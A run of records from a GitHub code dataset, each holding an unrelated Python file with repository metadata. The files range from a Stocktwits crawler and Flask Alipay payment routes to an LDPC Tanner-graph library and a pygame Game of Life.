\r\n\r\n The method waits until the appropriate time is passed for that ticket.\r\n \"\"\"\r\n if sub_id not in self._records:\r\n self.add_sub_id(sub_id)\r\n\r\n ticket = self._get_valid_ticket(sub_id)\r\n logger.debug(\"Got a ticket: {}\".format(ticket))\r\n ticket.wait_required_time()\r\n\r\n return ticket\r\n \r\n","repo_name":"yosi-dediashvili/SubiT","sub_path":"src/api/providers/torec/hamster.py","file_name":"hamster.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"34043931125","text":"import requests\nimport settings\nimport json\nimport logging\nimport os\nimport datetime\nfrom time import sleep\n\nlogger = settings.get_logger(os.path.realpath(__file__))\n\ndef run_collect(company, total_req):\n\n logger.info(company + \" started\")\n\n # files and vars\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(1)\n two_days_ago = today - datetime.timedelta(2)\n file_name = settings.DOWNLOADS_STWITS + \"/\" + company + \"/stwits-\" + company + \"-\" + str(yesterday) + \".csv\"\n dir = os.path.dirname(os.path.realpath(file_name))\n os.makedirs(dir, exist_ok=True)\n output = open(file_name, \"a\")\n\n max_id = '99999999'\n\n\n\n for j in range(0,1000):\n total_req +=1\n if total_req == 200:\n sleep(3600)\n total_req = 1\n\n logger.info(company + \": \" + str(j))\n\n if(company == \"the\"):\n url = 'https://api.stocktwits.com/api/2/streams/suggested.json?max=' + str(max_id)\n else:\n url = 'https://api.stocktwits.com/api/2/streams/symbol/' + company + '.json?max=' + str(max_id)\n\n req = requests.get(url).json()\n\n for i in range(0,30):\n\n if (req['messages'][i]['entities']['sentiment'] is not None):\n sentiment = req['messages'][i]['entities']['sentiment']['basic']\n else:\n sentiment = \"none\"\n created_at = req['messages'][i]['created_at']\n text = req['messages'][i]['body']\n\n\n # keep yesterday only\n if str(created_at)[0:10] == str(two_days_ago):\n logger.info(company + \" last id: \" + str(req['cursor']['max']))\n return total_req\n\n logger.debug(created_at + ', ' + sentiment + ', ' + text)\n output.write('\"' + created_at + '\",\"' + sentiment + '\",\"' + text + '\"\\n')\n\n max_id = req['cursor']['max']\n logger.debug('max_id: ' + str(max_id))\n\n logger.debug(json.dumps(req, indent=4, sort_keys=True))\n\n return total_req\n\n\n##################\n# start\nlogger.info(\"starting \" + os.path.basename(__file__))\n\n\ncompanies = [\"msft\", \"ko\", \"mcd\", \"ssnlf\", \"nflx\", \"nke\", \"tsla\", \"compq\", \"spx\", \"djia\", \"the\"]\n#companies = [\"msft\"]\n\n\ntotal_req = 1\n\nfor company in companies:\n total_req = run_collect(company, total_req)\n logger.info(company + \" finished\")\n\n\nlogger.info(\"ending \" + os.path.basename(__file__))\n# end\n###################\n\n\n\n","repo_name":"bromjiri/Presto","sub_path":"crawler/server/stwits-all.py","file_name":"stwits-all.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73810457124","text":"\r\n\r\na = [5, 5, 1, 3, 4, 2, 1]\r\n'''\r\n미션 : 리스트의 절사평균을 구하시오.\r\n- 절사평균이란 최소값과 최대값을 제외한 나머지값들의 평균\r\n-리스트의 합: sum(리스트명) 예)print(sum(a))\r\n- 단, 어떠한 리스트가 주어져도 수행될 수 있어야 함\r\n\r\n'''\r\na = [5, 5, 1, 3, 4, 2, 1]\r\na.sort()\r\ndel 
a[0]\r\na.pop()\r\nprint(sum(a)/len(a))\r\n\r\n#B)\r\nprint(min(a))\r\nprint(max(a))\r\na.remove(min(a))\r\na.remove(max(a))\r\nprint(sum(a)/len(a))\r\n\r\n\r\n\r\n","repo_name":"jangsejong/STUDY","sub_path":"비트캠프/03 리스트/리스트절사평균.py","file_name":"리스트절사평균.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27033089124","text":"from django.core.management.base import BaseCommand, CommandError\nimport random\nimport math\nimport pprint\nfrom ...models import Document, Sentence, Step\nfrom ...natural_selection import get_work_routing_info, change_populations\n\nclass Command(BaseCommand):\n help = \"\"\n\n def add_arguments(self, parser):\n parser.add_argument('--docid', action='store_true')\n parser.add_argument('--users', action='store_true')\n parser.add_argument('--nostop', action='store_true')\n pass\n\n def get_docid(self, options):\n if not options['docid']:\n docid = max([d.id for d in Document.objects.all()])\n else:\n docid = options['docid']\n return docid\n\n def get_users(self, options):\n if not options['users']:\n users = 20\n else:\n users = options['users']\n return users\n\n def handle(self, *args, **options):\n\n docid = self.get_docid(options)\n users = self.get_users(options)\n\n test_steps_start = Document.objects.get(id=docid).last_valid_step_id\n sample_step_id = test_steps_start\n\n print(\"deleted steps id larger than {}\".format(test_steps_start))\n Step.objects.filter(id__gt=test_steps_start).delete()\n initial_step = Step.objects.get(id=sample_step_id)\n\n ordinal = lambda n: \"%d%s\" % (n, \"tsnrhtdd\"[(math.floor(n / 10) % 10 != 1) * (n % 10 < 4) * n % 10::4])\n\n for i in range(1, users + 1):\n\n current_step = initial_step\n trials = random.randint(1, 5)\n print('--------------------------------')\n print('{} user will make {} Steps at maximum'.format(ordinal(i), trials))\n\n for _ in range(trials):\n\n next_action = get_work_routing_info(current_step.id)\n creatable = next_action['creatable']\n votable = next_action['votable']\n pprint.pprint(next_action)\n next_stage = next_action['next_stage']\n\n new_step = None\n if creatable:\n new_step = Step.objects.create(\n stage=next_stage,\n result=[str(i), str(i)],\n sentence_id=current_step.sentence_id,\n parent_step=current_step\n )\n new_step.save()\n next_action[\"step_list\"] = [new_step] + next_action[\"step_list\"]\n print('\\tcreating step(id={}) at {} stage'.format(new_step.id, next_stage))\n\n winner = None\n if votable:\n step_list = next_action[\"step_list\"]\n rest_list = step_list[2:]\n\n # privilege\n winner = random.choice([step_list[0]] + step_list[:2])\n winner.do_vote()\n\n while len(rest_list) > 0:\n winner = random.choice([winner, rest_list[0]])\n rest_list = rest_list[1:]\n\n print('\\tvoting w/ {} candidates. winner is {}'.format(len(step_list), winner.id))\n\n current_step = winner or new_step\n\n # current step is 4\n if not creatable and not votable:\n break\n\n # Change populations of next generation\n print('\\tchange population of {} stage'.format(next_stage))\n change_populations(next_stage)\n\n if not options['nostop']:\n input('\\tenter any key to proceed\\n')\n\n","repo_name":"dongkwan-kim/dike","sub_path":"dike/webdike/management/commands/test_selection.py","file_name":"test_selection.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10689865007","text":"from . 
import api\nfrom ihome import db\nfrom ihome.utils.commons import login_required\nfrom ihome.models import Order\nfrom flask import g, current_app, jsonify, request\nfrom ihome.utils.response_code import RET\nfrom alipay import AliPay\nimport os\nfrom ihome import constants\nimport json\n\n\n@api.route('/orders/<int:order_id>/payment', methods=['POST'])\n@login_required\ndef order_pay(order_id):\n    '''Initiate an Alipay payment'''\n    user_id = g.user_id\n    # Check the order status\n    try:\n        order = Order.query.filter(Order.id == order_id, Order.user_id == user_id, Order.status == 'WAIT_PAYMENT').first()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg='database error')\n\n    if order is None:\n        return jsonify(errno=RET.NODATA, errmsg='invalid order data')\n\n    app_private_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/app_private_key.pem')).read()\n    alipay_public_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/alipay_public_key.pem')).read()\n    # Create the Alipay SDK client object\n    alipay = AliPay(\n        appid=\"2021000118643231\",\n        app_notify_url=None, # the default notify path\n        app_private_key_string=app_private_key_string,\n        # alipay public key, do not use your own public key!\n        alipay_public_key_string=alipay_public_key_string,\n        sign_type=\"RSA2\", # RSA or RSA2\n        debug=True, # False by default\n        # config=AliPayConfig(timeout=15) # optional, request timeout\n    )\n\n    order_string = alipay.api_alipay_trade_wap_pay(\n        out_trade_no=order.id, # order number\n        total_amount=str(order.amount/100.0), # total amount\n        subject='爱家 %s' % order.id, # order title\n        return_url=\"http://127.0.0.1:5000/payComplete.html\", # URL to return the user to\n        notify_url=None # this is optional\n    )\n\n    # Build the payment URL the user is redirected to\n    pay_url = constants.ALIPAY_URL_PREFIX + order_string\n\n    return jsonify(errno=RET.OK, errmsg='OK', data={'pay_url':pay_url})\n\n@api.route('/orders/payment', methods=['PUT'])\ndef save_order_payment_result():\n    '''Save the order payment result'''\n    alipay_data = request.form.to_dict()\n    # sign must be popped out\n    # Split the Alipay data: extract the signature parameter 'sign' from the rest of the data\n    signature = alipay_data.pop(\"sign\")\n\n    print(json.dumps(alipay_data))\n    print(signature)\n\n    app_private_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/app_private_key.pem')).read()\n    alipay_public_key_string = open(os.path.join(os.path.dirname(__file__), 'keys/alipay_public_key.pem')).read()\n    # Create the Alipay SDK client object\n    alipay = AliPay(\n        appid=\"2021000118643231\",\n        app_notify_url=None, # the default notify path\n        app_private_key_string=app_private_key_string,\n        # alipay public key, do not use your own public key!\n        alipay_public_key_string=alipay_public_key_string,\n        sign_type=\"RSA2\", # RSA or RSA2\n        debug=True, # False by default\n        # config=AliPayConfig(timeout=15) # optional, request timeout\n    )\n\n    # verify\n    # Use the SDK to verify that the parameters are legitimate\n    # Returns True if the parameters are confirmed to come from Alipay, otherwise False\n    result = alipay.verify(alipay_data, signature)\n    order_id = alipay_data.get('out_trade_no')\n    trade_no = alipay_data.get('trade_no')\n    if result:\n        try:\n            Order.query.filter_by(id=order_id).update({'status':'WAIT_COMMENT', 'trade_no':trade_no})\n            db.session.commit()\n        except Exception as e:\n            current_app.logger.error(e)\n            db.session.rollback()\n\n    return jsonify(errno=RET.OK, errmsg='OK')\n","repo_name":"bql-mystar/Flask-ihome","sub_path":"ihome/api_1_0/pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"71996313124","text":"# json2kml.py\n# 2023-06-01 K.OHWADA\n\nimport simplekml\nimport json\nimport 
urllib.parse\n\nFORMAT_DESCRIPTION = '<![CDATA[<a href=\"{href}\">{name}</a>]]>'\n\n# Document\nDOC_NAME = 'Crown Dependencies'\nDOC_DESC = 'display the Flag at the Coordinates of Islands'\nFILENAME = 'crown_dependencies.kml'\n\n# create kml\nkml = simplekml.Kml()\nkml.document.name = DOC_NAME\nkml.document.description = DOC_DESC\n\nwith open('crown_dependencies_coordinates.json') as f1:\n dic = json.load(f1)\n list_islands = dic['islands']\n#\n\n\n# Placemark\nfor item in list_islands:\n\tisland = item['island']\n\turl_island = item['url_island']\n\turl_flag = item['url_flag']\n\tlat = item['lat']\n\tlon = item['lon']\n\tprint(island)\n\n\tpoint = kml.newpoint(name = island)\n\tpoint.coords = [(lon, lat)]\n\tpoint.style.iconstyle.icon.href = url_flag\n\tpoint.description = FORMAT_DESCRIPTION.format(href=url_island, name=island)\n#\n\nkml.save(FILENAME)\n\n","repo_name":"ohwada/World_Countries","sub_path":"national_flags_gmap/crown_dependencies/python/json2kml.py","file_name":"json2kml.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7175003323","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required\nfrom sqlalchemy import asc, desc\nimport requests\nfrom app.models import User, Subscription, db, Video\n\nuser_routes = Blueprint('users', __name__)\n\n\n@user_routes.route('/')\n@login_required\ndef users():\n users = User.query.all()\n return {\n \"users\": [user.to_dict() for user in users]\n }\n\n\n@user_routes.route('/<int:id>')\n@login_required\ndef user(id):\n user = User.query.get(id)\n return user.to_dict()\n\n\n@user_routes.route('/subscribe', methods=['POST'])\n@login_required\ndef subscribe():\n data = request.json\n subscribe = Subscription(user_id=data['user_id'],\n channel_id=data['channel_id'])\n db.session.add(subscribe)\n db.session.commit()\n return user(data['user_id'])\n\n\n@user_routes.route('/unsubscribe', methods=['DELETE'])\n@login_required\ndef unsubscriptions():\n data = request.json\n subscription = User.query.get(data['user_id'])\n subscription = subscription.get_unsubscription(\n channel_id=data['channel_id'])\n db.session.delete(subscription)\n db.session.commit()\n return user(data['user_id'])\n","repo_name":"joshsomthin/noobtube","sub_path":"app/api/user_routes.py","file_name":"user_routes.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34572524109","text":"\"\"\"\n\nA parent of all LDPC codes included in this library\n\nThis class provides a structure which all LDPC codes can manipulate in their individual constructions.\nThe tanner_graph attribute presents a dictionary where row indices are mapped to lists of column indices.\nThis structure is populated in the respective subclasses. It is a requirement of all subclasses to define\nthe width, height, and tanner_graph attributes of this superclass, as intermediary functions rely on these\nfields to function appropriately\n\nThe Tanner (Bipartite) graph representation describes the same code as the corresponding parity check matrix.\nEach row contained within the structural dictionary describes a row in the corresponding matrix: the key value\nindicates the index of the row in the matrix, and the value list describes the locations of the entries\ncontained in that matrix row. 
Unlisted values are assumed to be empty and therefore zero in the matrix representation\n\n\"\"\"\n\nimport random\n\n\nclass TannerGraph:\n\n # All subclasses must implement height, width, tanner_graph definitions\n # parameters:\n # args: list, contains any possible arguments a subclass might require for their respective constructions\n # construction: if a subclass implements multiple constructions, this field identifies the construction used by a subclass instance\n # return:\n # a TannerGraph object with the tanner_graph dictionary instantiated empty\n def __init__(self, args, construction=None):\n\n self.args = args\n self.construction = construction\n\n self.width = None\n self.height = None\n\n self.tanner_graph = {}\n\n # parameters:\n # row: int, the row r contained as a key by self.tanner_graph\n # value: int, the value which self.tanner_graph.get(row) must append to itself\n # return:\n # None, appends value internally\n def append(self, row, value):\n self.tanner_graph[row].append(value)\n\n # parameters:\n # row: int, row index to query\n # return:\n # list, the calue associated with the row parameter in self.tanner_graph\n def getRow(self, row):\n return self.tanner_graph[row]\n\n # Adds another row below the existing rows in self.tanner_graph. This corresponds to increasing the number\n # of parity bits and reducing the number of message bits. In this sense, an n/k code is transformed into\n # an n/k-1 code. This row is irrelevant until population, as it is initially empty (corresponding to a row\n # 0s in the matrix representation\n # return:\n # None\n def addRow(self):\n self.tanner_graph[len(self.tanner_graph)] = []\n\n # return:\n # a list of row indices contained in the Graph\n def keys(self):\n return list(self.tanner_graph.keys())\n\n # WARNING: This function performs insertion without warning if data is being overriden\n # parameters:\n # row_index: int, the index of the row to be appended (location along the height of the matrix)\n # row: list, the actual row to insert\n def put(self, row_index, row):\n self.tanner_graph[row_index] = row\n\n # return:\n # the number of rows (either populated or not) described by this Tanner Graph\n def __len__(self):\n return len(self.tanner_graph)\n\n # If Two graphs overlap, it is indicated that both graphs contain one or more entries in the same location.\n # parameters:\n # other: TannerGraph, the comparative graph\n # return:\n # boolean value: indicating if self and other overlap\n def overlaps(self, other):\n\n if len(self.tanner_graph.keys()) <= len(other.keys()):\n smaller = self\n larger = other\n else:\n smaller = other\n larger = self\n\n for i in range(len(smaller)):\n for entry in smaller.getRow(i):\n if entry in larger.getRow(i):\n return True\n\n return False\n\n # Performs an insertion of one smaller TannerGraph into another. 
This is described more easily in terms of code matrices.\n # Matrix code m can be inserted into matrix code n at location (i, j) if i + m.width < n.width and j + m.height < n.height.\n # Code M would replace all entries and non entries in the scope of rows j -> j + m.height and columns i -> m.width with its\n # own relative entries and non entries\n # parameters:\n # other: TannerGraph, the graph which self must absorb\n # location: list, the [row, col] values at which the insertion is to occur\n # return:\n # None, all changes are made in self internally\n def insert(self, other, location): # location: [row, column]\n\n # clears graph\n for r in range(other.height):\n c = 0\n while c < len(self.tanner_graph[r + location[0]]):\n if location[1] <= self.tanner_graph[r + location[0]][c] < location[1] + other.width:\n self.tanner_graph[r + location[0]].pop(c)\n c -= 1\n\n c += 1\n\n # populates graph\n for r in range(other.height):\n for c in other.tanner_graph[r]:\n if location[1] + c not in self.tanner_graph[location[0] + r]:\n self.tanner_graph[location[0] + r].append(location[1] + c)\n\n # no errors thrown for out of bounds\n\n # Equivalent to the process of summing two code matrices. The summation is performed given the two matrices do not\n # overlap. If one matrix is smaller than the other, the larger matrix will contain all the changes and is returned.\n # The summation in this case will occur in the scope of rows: i -> i + smaller.height, columns: j -> j + smaller.width\n # given location: [i, j]\n # parameters:\n # other: TannerGraph, the second tanner graph involved in the summation\n # location: list [r, c], the coordinates where the summation is to start in the larger graph\n def absorb_nonoverlapping(self, other, location):\n\n if self.overlaps(other):\n print(\"cannot combine matrices, they overlap\")\n return None\n\n if len(self.tanner_graph.keys()) <= len(other.keys()):\n smaller = self\n larger = other\n else:\n smaller = other\n larger = self\n\n for r in range(smaller.height):\n for c in smaller.getRow(r):\n larger.getRow(r + location[0]).append(c + location[1])\n\n return larger\n\n def permute_rows(self, permutation_list=None):\n\n if permutation_list is None:\n permutation_list = random.sample(range(self.height), self.height)\n else:\n if len(permutation_list) != self.height:\n print(\"cannot perform graph row permutation: invalid permutation list\")\n return\n\n for i in range(len(permutation_list)):\n self.swap_rows(i, permutation_list[i])\n\n return None\n\n # swaps two rows given row indices\n def swap_rows(self, i, j):\n temp = self.tanner_graph[i]\n self.tanner_graph[i] = self.tanner_graph[j].copy()\n self.tanner_graph[j] = temp\n\n # randomly shuffles the columns of the code\n def permute_columns(self, permutation_list=None):\n\n if permutation_list is None:\n permutation_list = random.sample(range(self.width), self.width)\n else:\n if len(permutation_list) != self.width:\n raise RuntimeError(\"cannot perform graph row permutation: invalid permutation list\")\n\n # we first transpose the graph and then permute the rows and then transpose again\n self.tanner_graph = transpose(self.tanner_graph, self.width)\n self.height, self.width = self.width, self.height\n self.permute_rows(permutation_list)\n\n self.tanner_graph = transpose(self.tanner_graph, self.width)\n self.height, self.width = self.width, self.height\n\n # swaps two columns given column indices\n def swap_columns(self, i, j):\n for row in self.tanner_graph:\n for e in range(len(self.getRow(row))):\n if 
self.getRow(row)[e] == i:\n self.tanner_graph[row][e] = j\n elif self.getRow(row)[e] == j:\n self.tanner_graph[row][e] = i\n\n # return:\n # returns the matrix representation of this TannerGraph instance\n def as_matrix(self):\n return get_matrix_representation(self.tanner_graph)\n\n\n# parameters:\n# row: int, number of rows to initializes in this Tanner Graph\n# width: int, width of Graph\n# height: int, height of Graph\n# return:\n# Empty Tanner Graph instantiation with width, height attributes defined\ndef make_graph(rows, width, height):\n graph = TannerGraph(None)\n\n graph.width = width\n graph.height = height\n\n for i in range(rows):\n graph.addRow()\n\n return graph\n\n\n'''\nTraverses the dictionary to find identical key values. These correspond to repeated parity check equations which\ncould undermine the code's performance.\n'''\n\n\n# parameters:\n# tanner_graph: TannerGraph.tanner_graph dictionary\n# returns:\n# boolean indicating whether or not the dict contains repeated list values\ndef has_repeated_rows(tanner_graph):\n for i in range(0, len(tanner_graph) - 1):\n for j in range(i + 1, len(tanner_graph)):\n if tanner_graph[i] == tanner_graph[j]:\n print(\"row \" + str(i) + \" and row \" + str(j) + \" are identical\")\n return True\n return False\n\n\n'''\nThe equivalent of transposing a matrix, if that matrix were represented by a bipartite graph. This allows for more\ndiverse methods of matrix construction.\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary, the graph to be transposed\n# returns:\n# TannerGraph.tanner_graph attribute representing the transposed dictionary\ndef transpose(tanner_graph, new_height):\n new_graph = {i: [] for i in range(new_height)}\n for row in tanner_graph:\n for col in tanner_graph[row]:\n new_graph[col].append(row)\n return new_graph\n\n\n'''\nBecause this program stores ldpc parity information in the form of tanner graphs, this provides a way to construct\nthe appropriate matrix provided the tanner graph\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary, the dict object for which a representation must be made\n# returns:\n# matrix, list(list()) where 1s represent entries and 0s represent lack of thereof\ndef get_matrix_representation(tanner_graph):\n matrix = []\n for i in range(len(tanner_graph)):\n row = []\n if i in tanner_graph:\n for j in range(max(tanner_graph[i]) + 1):\n if j in tanner_graph[i]:\n row.append(1)\n else:\n row.append(0)\n matrix.append(row)\n normalize(matrix)\n return matrix\n\n\n'''\nBecause only rows are directly indexed in the first level of the tanner_graph, the width of a tanner_graph dict\nis not inherently directly stored anywhere. The dictionary's lists must be traversed to find the maximum index.\nThe max + 1 indicates the width of the tanner_graph\n'''\n\n\n# parameters:\n# tanner_graph: Tanner.tanner_graph dictionary of which the width must be found\n# return:\n# int, width of the tanner_graph\ndef get_width(tanner_graph):\n max = 0\n for row in tanner_graph:\n for index in tanner_graph[row]:\n if index > max:\n max = index\n return max + 1\n\n\n'''\nPerforms a circular right shift of all elements in a given list\n'''\n\n\n# parameters:\n# row: list, a list to be right shifted. This list is commonly a row of a TannerGraph in library implementations\n# width: int, the cap to the right-shift. 
If the width is surpassed by any element, that element is reset to 0\ndef right_shift_row(row, width):\n for i in range(len(row)):\n if row[i] == width - 1:\n row[i] = 0\n else:\n row[i] += 1\n\n\n'''\nGiven a list of lists, this method normalizes all sublists to the same size by populating smaller sublists with 0s.\nThis method is intended to normalize matrix representations for aesthetic purposes\n'''\n\n\n# parameters:\n# arr: list(list()), array to be normalized\n# return:\n# list(list()) normalized 2d list\ndef normalize(arr):\n new_length = largest_row(arr)\n for i in range(len(arr)):\n arr[i] = arr[i] + [0] * (new_length - len(arr[i]))\n\n\n'''\nIteratively finds the length of the longest sublist contained in a list of lists.\n'''\n\n\n# parameters:\n# arr: list, list to be queried\n# return:\n# int, length of larges sublist in an array\ndef largest_row(arr):\n largest = 0\n for row in arr:\n if len(row) > largest:\n largest = len(row)\n return largest\n\n\n'''\nanalyzes a given code with a few print statements\n'''\n\n\n# parameters:\n# TannerGraph, graph to be analyzed\n# printCode, whether to display the entire code (suitable only for small matrices)\ndef analyze(code, printCode=False):\n print()\n print(\"arguments: \" + str(code.args))\n print(\"code construction: \" + code.construction)\n\n matrix = code.as_matrix()\n\n if printCode:\n print(\"code as graph\")\n print(code.tanner_graph)\n\n print(\"code as matrix: \")\n for line in matrix:\n print(line)\n\n row_weights = []\n for line in matrix:\n row_weights.append(line.count(1))\n\n col_weights = []\n for c in range(len(matrix[0])):\n\n col_weight = 0\n for r in range(len(matrix)):\n if matrix[r][c] == 1:\n col_weight += 1\n\n col_weights.append(col_weight)\n\n row_weights = list(dict.fromkeys(row_weights))\n col_weights = list(dict.fromkeys(col_weights))\n\n print(\"row weights: \" + str(row_weights))\n print(\"col weights: \" + str(col_weights))\n\n print(\"width: \" + str(code.width))\n print(\"height: \" + str(code.height))\n print()\n\n\n'''\nDisplays a TannerGraph object in matrix form\n'''\n\n\n# parameters:\n# graph: TannerGraph\ndef printm(graph):\n m = graph.as_matrix()\n for line in m:\n print(line)\n","repo_name":"shubhamchandak94/ProtographLDPC","sub_path":"LDPC-library/libs/TannerGraph.py","file_name":"TannerGraph.py","file_ext":"py","file_size_in_byte":14009,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"30406139304","text":"import numpy as np\n\nfrom constants import TIMESTEPS, UPSAMPLE\n\n# There are two options of reduction for the da vector:\n# ss - sum of squares\n# sa - sum of absolutes\n\n\nclass TimeLagFeature(object):\n \"\"\"\n This feature calculates the time difference between the main channel and all other channels in terms of\n maximal depolarization, and the following after hyperpolarization.\n The feature only takes into consideration channels that have crossed a certain threshold, determined by the\n maximal depolarization of the main channel.\n \"\"\"\n\n def __init__(self, ratio=0.25, data_name='dep'):\n # Indicates the percentage of the maximum depolarization that will be considered as a threshold\n self.ratio = ratio\n\n self.name = 'Time-lag'\n self.data = data_name\n\n def set_data(self, new_data):\n self.data = new_data\n\n def calculate_feature(self, spike_lst, amps):\n \"\"\"\n inputs:\n spike_lst: A list of Spike object that the feature will be calculated upon.\n\n returns:\n A matrix in which entry (i, j) refers to the 
j metric of Spike number i.\n \"\"\"\n result = [self.calc_feature_spike(spike.get_data(), amp) for spike, amp in zip(spike_lst, amps)]\n result = np.asarray(result)\n return result\n\n def calc_feature_spike(self, spike, amp):\n \"\"\"\n inputs:\n spike: the spike to be processed; it is a matrix with the dimensions of (NUM_CHANNELS, TIMESTEPS * UPSAMPLE)\n\n The function calculates different time lag features of the spike\n\n returns: a list containing the following values:\n -red: the reduction of the depolarization vector (i.e\n the vector that indicates the time difference of maximal depolarization between each channel and the main\n channel)\n -sd: the standard deviation of the depolarization vector\n \"\"\"\n # remove channels with lower amplitude than required\n max_amp = np.max(amp)\n fix_inds = amp >= self.ratio * max_amp\n amp = amp[fix_inds]\n spike = spike[fix_inds]\n\n # find timestamps for the event in ok channels, filter again to assure the event is reached before the end\n ind = np.argmin(spike, axis=1)\n # if event is reached at the end, it indicates noise\n fix_inds = ind < (TIMESTEPS * UPSAMPLE - 1)\n amp = amp[fix_inds]\n ind = ind[fix_inds]\n spike = spike[fix_inds]\n if spike.shape[0] <= 1: # if no channel passes filtering return zeros (or if only one channel)\n return [0, 0]\n\n # offset according to the main channel\n # set main channel to be the one with highest t2p\n main_chn = amp.argmax()\n rel = ind - ind[main_chn] # offsetting\n\n # calculate sd of event time differences\n sd = np.std(rel)\n\n # calculate reduction\n red = np.mean(rel ** 2)\n\n return [red, sd]\n\n @property\n def headers(self):\n \"\"\"\n Returns a list of titles of the different metrics\n \"\"\"\n return [f\"{self.data}_{self.name}_SS\", f\"{self.data}_{self.name}_SD\"]\n","repo_name":"EranStarkLab/SpatiotemporalSpiking","sub_path":"src/features/spatial_features/FET_time_lag.py","file_name":"FET_time_lag.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11910968810","text":"\"\"\"\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2021/4/23 0023 17:14\r\n# @Author : 源来很巧\r\n# @FileName: 康为生命游戏2.py\r\n# @Software: PyCharm\r\n# @Blog :https://blog.csdn.net/qq_44793283\r\n\"\"\"\r\nimport sys\r\nimport random\r\nimport numpy as np\r\nimport pygame\r\npygame.init()#初始化init()及设置\r\nn=int(input(\"请输入阶数:\"))\r\nsize=width,height=50*n+2,50*n+2\r\nscreen=pygame.display.set_mode(size)#窗口大小\r\npygame.display.set_caption(\"康威生命游戏\")#窗口名字\r\nicon=pygame.image.load(\"Icon.jpg\")\r\npygame.display.set_icon(icon)\r\nBLACK=pygame.Color(\"black\")\r\nGAINSBORO=pygame.Color(\"gainsboro\")\r\nMOCCASIN=pygame.Color(\"moccasin\")\r\nWHITE=pygame.Color(\"white\")\r\nscreen.fill(MOCCASIN)\r\nfps=1\r\nfclock=pygame.time.Clock()#创建一个Clock对象用于操作时间\r\n\r\n\r\n## 生成初始生命\r\na=[]\r\nfor i in range(0,n):\r\n a.append([])\r\n for j in range(0,n):\r\n a[i].append(random.randint(0,1))\r\n\r\n## 八个方位的索引变化\r\ndirection = [[-1, -1], [0, -1], [1, -1], [1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0]]\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # 点击了退出\r\n sys.exit() # 退出\r\n c = []\r\n # 计算周围生命个数\r\n for i in range(0, n):\r\n c.append([])\r\n for j in range(0, n):\r\n count = 0 # 每一个方格\r\n for o in direction:\r\n ide = np.array([i, j]) + np.array(o)\r\n # 保证判断的位置在范围内,针对边界方格\r\n if 0 <= ide[0] < n and 0 <= ide[1] < n:\r\n if a[ide[0]][ide[1]] == 1:\r\n count += 1\r\n c[i].append(count)\r\n ## 
按照生命的发展规律进行新一轮的生面变化\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if c[i][j] <= 1 or c[i][j] >= 4:#当生命稀少或者过多时生命死亡\r\n a[i][j] = 0\r\n elif c[i][j] == 3:#当生命的周围有三个生命时,生成新生命\r\n a[i][j] = 1\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if a[i][j]==1:\r\n #先画一个满填充的方格,有生命方格\r\n pygame.draw.rect(screen, BLACK, (i*50, j*50, 50, 50))\r\n #再画一个不填充,框线为2的方格,套在上面的方格上面\r\n pygame.draw.rect(screen, GAINSBORO, (i*50, j*50, 50, 50),2)\r\n\r\n else:#无生命方格\r\n pygame.draw.rect(screen, WHITE, (i*50, j*50, 50, 50))\r\n pygame.draw.rect(screen, GAINSBORO, (i*50, j*50, 50, 50),2)\r\n print(np.array(a))\r\n pygame.display.update() # 对显示窗口进行更新,默认窗口全部重绘\r\n fclock.tick(fps) # 窗口刷新速度,每秒3次\r\n\r\n\r\n","repo_name":"Lance-Owen/ConwayGame","sub_path":"康为生命游戏2.py","file_name":"康为生命游戏2.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71813450084","text":"import retailitems_class\r\nclass register():\r\n def __init__(self):\r\n self.register_list = []\r\n def getlistitems(self):\r\n return self.register_list\r\n def purchase_items(self, object_added):\r\n self.register_list.append(object_added)\r\n def get_total(self,object_added):\r\n self.total = 0\r\n self.total += object_added.getprices()\r\n return self.total\r\n def clear_items(self):\r\n self.register_list.clear()\r\n\r\n\r\ndef main():\r\n #create object'shirt','20','24.95\r\n obj = retailitems_class.retail('shirt','20',10)\r\n obj1 = retailitems_class.retail('Jacket','10',100)\r\n obj2 = retailitems_class.retail('Jeans','10',24.95)\r\n register_object =register()\r\n register_object.purchase_items(obj)\r\n register_object.purchase_items(obj1)\r\n register_object.purchase_items(obj2)\r\n array = register_object.getlistitems()\r\n for i in array:\r\n print(\"\")\r\n print(i)\r\n print(\"----------------\")\r\n t=register_object.get_total(obj)\r\n r=register_object.get_total(obj1)\r\n l=register_object.get_total(obj2)\r\n print(\"Total:\"+ 